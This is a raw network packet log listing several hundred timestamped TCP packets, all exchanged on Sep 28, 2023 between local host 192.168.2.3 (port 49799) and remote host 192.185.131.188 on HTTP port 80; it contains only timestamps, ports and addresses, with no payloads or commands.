Sep 28, 2023 06:01:55.006527901 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006536007 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006540060 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006571054 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006572962 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006623983 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006624937 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006659985 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006679058 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006695986 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006696939 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006750107 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006773949 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006836891 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006838083 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006890059 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.006900072 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006944895 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.006999016 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.007055998 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.007070065 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.007101059 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.007194996 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.117801905 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.117880106 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.117943048 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.117955923 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.117969036 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.118010998 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.118035078 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.118057966 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.118120909 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.118124008 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.118175983 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.118256092 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.118319988 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.118331909 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.118390083 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.118396044 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.118449926 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.118452072 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.118464947 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.118506908 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.118526936 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.118554115 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.118609905 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.118654013 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.118671894 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.118710041 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.118726969 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.118727922 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.118751049 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.118757963 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.118779898 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.118782043 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.118812084 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.118823051 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.118871927 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.118879080 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.118927956 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.118974924 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.119033098 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.119036913 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.119071960 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.119103909 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.119141102 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.119164944 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.119184971 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.119206905 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.119267941 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.119296074 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.119313002 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.119358063 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.119374037 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.119379044 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.119406939 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.119468927 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.119528055 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.119601965 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.119662046 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.119668961 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.119716883 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.119730949 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.119785070 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.119787931 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.119818926 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.119879007 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.119935036 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.119961023 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.120017052 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.120078087 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.120138884 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.120189905 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.120270014 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.120275021 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.120309114 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.120345116 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.120397091 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.120399952 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.120451927 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.120477915 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.120528936 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.120549917 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.120573044 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.120599985 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.120614052 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.120683908 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.120734930 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.120748043 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.120793104 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.120796919 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.120837927 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.120852947 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.120898962 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.120927095 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.120973110 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.120995045 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121032000 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121047974 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121063948 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121085882 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121129036 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121162891 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121175051 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121206999 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121222973 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121258974 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121304035 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121309042 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121345997 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121356010 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121406078 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121409893 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121449947 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121468067 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121490955 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121515036 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121527910 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121547937 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121596098 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121613026 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121664047 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121669054 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121694088 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121718884 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121733904 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121766090 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121786118 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121833086 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121850967 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121891022 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121903896 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121942043 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.121952057 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.121989012 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.122030973 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.122050047 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.122066021 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.122081041 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.122140884 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.122176886 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.122204065 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.122247934 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.122275114 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.122313023 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.122368097 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.122406006 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.122407913 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.122438908 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.122466087 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.122522116 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.122549057 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.122587919 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.122616053 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.122646093 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.122658968 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.122680902 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.122695923 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.122736931 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.122754097 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.122802019 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.122814894 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.122848988 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.122859955 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.122886896 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.122914076 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.122958899 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.122965097 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.123003960 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.123060942 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.123105049 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.123177052 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.123223066 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.123256922 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.123302937 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.123327017 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.123370886 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.123394966 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.123425961 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.123439074 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.123440981 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.123451948 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.123466969 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.123477936 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.123495102 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.123498917 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.123533010 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.123568058 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.123613119 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.123615026 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.123647928 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.123660088 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.123683929 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.123684883 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.123719931 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.123744011 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.123789072 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.123851061 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.123895884 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.123904943 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.123950005 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.123964071 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124007940 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124027014 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124068022 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124072075 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124097109 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124114037 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124133110 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124144077 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124167919 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124178886 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124203920 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124223948 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124237061 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124273062 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124279976 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124291897 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124314070 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124340057 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124349117 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124361992 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124381065 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124387980 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124397993 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124423027 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124425888 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124449015 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124459982 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124479055 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124530077 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124567986 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124610901 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124646902 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124710083 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124747038 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124773979 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124810934 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124816895 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124841928 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124857903 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124891043 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124907017 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124936104 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.124952078 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.124972105 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125037909 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125077963 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125082016 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125114918 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125134945 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125148058 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125159979 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125180006 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125183105 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125200033 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125226974 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125228882 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125294924 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125332117 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125349045 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125360966 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125412941 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125430107 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125485897 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125504971 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125554085 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125579119 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125591993 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125616074 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125626087 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125632048 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125638962 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125649929 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125662088 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125679016 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125684023 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125706911 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125719070 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125730991 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125742912 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125755072 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125767946 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125787020 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125833035 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125869036 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125896931 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125932932 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125935078 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.125971079 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.125986099 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.126008987 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.126020908 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.126033068 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.126048088 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.126072884 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.126087904 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.126121998 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.126149893 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.126192093 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.126219034 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.126260042 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.126269102 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.126322031 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.126326084 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.126363039 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.126370907 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.126411915 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.126480103 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.126516104 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.126524925 CEST	49799	80	192.168.2.3	192.185.131.188
Sep 28, 2023 06:01:55.126529932 CEST	80	49799	192.185.131.188	192.168.2.3
Sep 28, 2023 06:01:55.126557112 CEST	49799	80	192.168.2.3	192.185.131.188
